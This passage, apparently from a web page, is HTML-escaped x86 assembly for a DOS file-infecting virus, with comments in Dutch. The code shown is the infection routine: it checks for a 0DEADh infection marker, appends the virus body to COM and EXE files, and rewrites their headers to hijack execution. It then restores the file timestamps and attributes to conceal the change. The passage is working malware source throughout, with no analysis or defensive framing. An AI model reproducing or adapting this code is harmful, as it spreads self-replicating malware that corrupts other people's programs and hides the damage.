&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; Signature,5a4dh&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; Controleer of ID aanwezig is&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jne&amp;nbsp;&amp;nbsp;&amp;nbsp; @@72&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; ExeID,0DEADh&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jmp&amp;nbsp;&amp;nbsp;&amp;nbsp; @@73&lt;br /&gt;
@@72:&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; ComID,0DEADh&lt;br /&gt;
@@73:&amp;nbsp;&amp;nbsp;&amp;nbsp; jmpe&amp;nbsp;&amp;nbsp;&amp;nbsp; @@80&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; als ID aanwezig is, stop dan&lt;br /&gt;
@@74:&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; Signature,5a4dh&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; je&amp;nbsp;&amp;nbsp;&amp;nbsp; @@77&lt;br /&gt;
@@75:&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,4202h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; infecteer com-files&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,cx&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; ga naar het einde van de file&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; dx,dx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; DOS&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,10h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; aanpassen van de com-header&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; div&amp;nbsp;&amp;nbsp;&amp;nbsp; cx&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; aan deze com-file&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; or&amp;nbsp;&amp;nbsp;&amp;nbsp; dx,dx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; je&amp;nbsp;&amp;nbsp;&amp;nbsp; @@76&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ah,40h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,10h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; sub&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,dx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; dx,dx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; DOS&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jmpc&amp;nbsp;&amp;nbsp;&amp;nbsp; @@80&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; inc&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&lt;br /&gt;
@@76:&amp;nbsp;&amp;nbsp;&amp;nbsp; add&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,10h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; OldSize,ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; si,offset Header&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; bewaar het eerste deel van&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; di,offset SavedCode&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; het programma&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,Dead-ComHeader+2&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cld&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; rep&amp;nbsp;&amp;nbsp;&amp;nbsp; movsb&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ah,40h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; schrijf het virus achter het&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,CodeSize&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; programma&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; dx,dx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; DOS&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jmpc&amp;nbsp;&amp;nbsp;&amp;nbsp; @@80&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,4200h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; ga naar het begin van de file&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,cx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; dx,dx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; DOS&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jmpc&amp;nbsp;&amp;nbsp;&amp;nbsp; @@80&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ah,40h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; overschrijf het begin van het&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,Dead-ComHeader+2&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; programma met de com-header&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; dx,offset ComHeader&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; DOS&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jmp&amp;nbsp;&amp;nbsp;&amp;nbsp; @@80&lt;br /&gt;
@@77:&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; di,offset SavedCode&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; infecteer exe-files&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,5a4dh&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; bewaar de oude waarden van&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; stosw&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; cs:ip en ss:sp&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,ExeIP&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; stosw&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,ExeCS&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; stosw&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,ExeSP&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; stosw&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,ExeSS&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; stosw&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,PartPage&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; stosw&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,PageCount&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; stosw&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ExeID,0DEADh&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; Zet ID in exe-header&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,4202h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,cx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; dx,dx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; int&amp;nbsp;&amp;nbsp;&amp;nbsp; 21h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,10h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; div&amp;nbsp;&amp;nbsp;&amp;nbsp; cx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; or&amp;nbsp;&amp;nbsp;&amp;nbsp; dx,dx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; je&amp;nbsp;&amp;nbsp;&amp;nbsp; @@78&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; dx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ah,40h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,10h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; sub&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,dx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; dx,dx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; DOS&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; dx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jc&amp;nbsp;&amp;nbsp;&amp;nbsp; @@80&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; inc&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&lt;br /&gt;
@@78:&amp;nbsp;&amp;nbsp;&amp;nbsp; sub&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,HeaderSize&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ExeCS,ax&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ExeIP,offset Begin&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; add&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,VirusSizePara&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ExeSS,ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ExeSP,200h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,MinMem&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,20h+VirusSizePara-CodeSizePara&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jae&amp;nbsp;&amp;nbsp;&amp;nbsp; @@79&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,20h&lt;br /&gt;
@@79:&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; MinMem,ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ah,40h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; schrijf het virus achter&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,CodeSize&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; de exe-file&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; dx,dx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; DOS&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jc&amp;nbsp;&amp;nbsp;&amp;nbsp; @@80&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,4202h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; Pas de file-lengte in de&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,cx&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; header aan, als de file veel&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; dx,dx&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; overlays bevat, dan zal de&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; DOS&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; exe-file niet meer werken,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,200h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; maar de file kan wel hersteld&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; div&amp;nbsp;&amp;nbsp;&amp;nbsp; cx&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; worden.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; dx,1&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cmc&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; adc&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,0&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; PageCount,ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; PartPage,dx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,4200h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,cx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; dx,dx&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; ga naar het begin van de file&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; DOS&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jc&amp;nbsp;&amp;nbsp;&amp;nbsp; @@80&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ah,40h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; schrijf de nieuwe exe-header&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,HeaderLength&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; over de oude heen.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; dx,offset Header&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; DOS&lt;br /&gt;
@@80:&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; dx&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; herstel de datum van de file&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; cx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,5701h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; DOS&lt;br /&gt;
@@81:&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ah,3eh&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; sluit de file&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; DOS&lt;br /&gt;
@@82:&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; ds&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; herstel de attributen van de&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; dx&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; file&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; cx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; test&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,1&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jz&amp;nbsp;&amp;nbsp;&amp;nbsp; @@83&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,4301h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; DOS&lt;br /&gt;
@@83:&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; es&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; herstel de waarden van de&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; bp&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; registers en keer terug&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; di&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; naar het oude interrupt 21&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; si&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; cx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; bx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; ret&lt;br /&gt;
&lt;br /&gt;
CodeEnd&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; equ&amp;nbsp;&amp;nbsp;&amp;nbsp; $&lt;br /&gt;
&lt;br /&gt;
Header&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; dw&amp;nbsp;&amp;nbsp;&amp;nbsp; HeaderLength/2 dup(0)&lt;br /&gt;
ComCS&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; equ&amp;nbsp;&amp;nbsp;&amp;nbsp; Header[OldSize-Comheader]&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Com file&lt;br /&gt;
ComID&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; equ&amp;nbsp;&amp;nbsp;&amp;nbsp; Header[Dead-ComHeader]&lt;br /&gt;
&lt;br /&gt;
Signature&amp;nbsp;&amp;nbsp;&amp;nbsp; equ&amp;nbsp;&amp;nbsp;&amp;nbsp; Header[0h]&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; Exe file&lt;br /&gt;
PartPage&amp;nbsp;&amp;nbsp;&amp;nbsp; equ&amp;nbsp;&amp;nbsp;&amp;nbsp; Header[2h]&lt;br /&gt;
PageCount&amp;nbsp;&amp;nbsp;&amp;nbsp; equ&amp;nbsp;&amp;nbsp;&amp;nbsp; Header[4h]&lt;br /&gt;
HeaderSize&amp;nbsp;&amp;nbsp;&amp;nbsp; equ&amp;nbsp;&amp;nbsp;&amp;nbsp; Header[8h]&lt;br /&gt;
MinMem&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; equ&amp;nbsp;&amp;nbsp;&amp;nbsp; Header[0ah]&lt;br /&gt;
MaxMem&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; equ&amp;nbsp;&amp;nbsp;&amp;nbsp; Header[0ch]&lt;br /&gt;
ExeSS&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; equ&amp;nbsp;&amp;nbsp;&amp;nbsp; Header[0eh]&lt;br /&gt;
ExeSP&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; equ&amp;nbsp;&amp;nbsp;&amp;nbsp; Header[10h]&lt;br /&gt;
ExeID&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; equ&amp;nbsp;&amp;nbsp;&amp;nbsp; Header[12h]&lt;br /&gt;
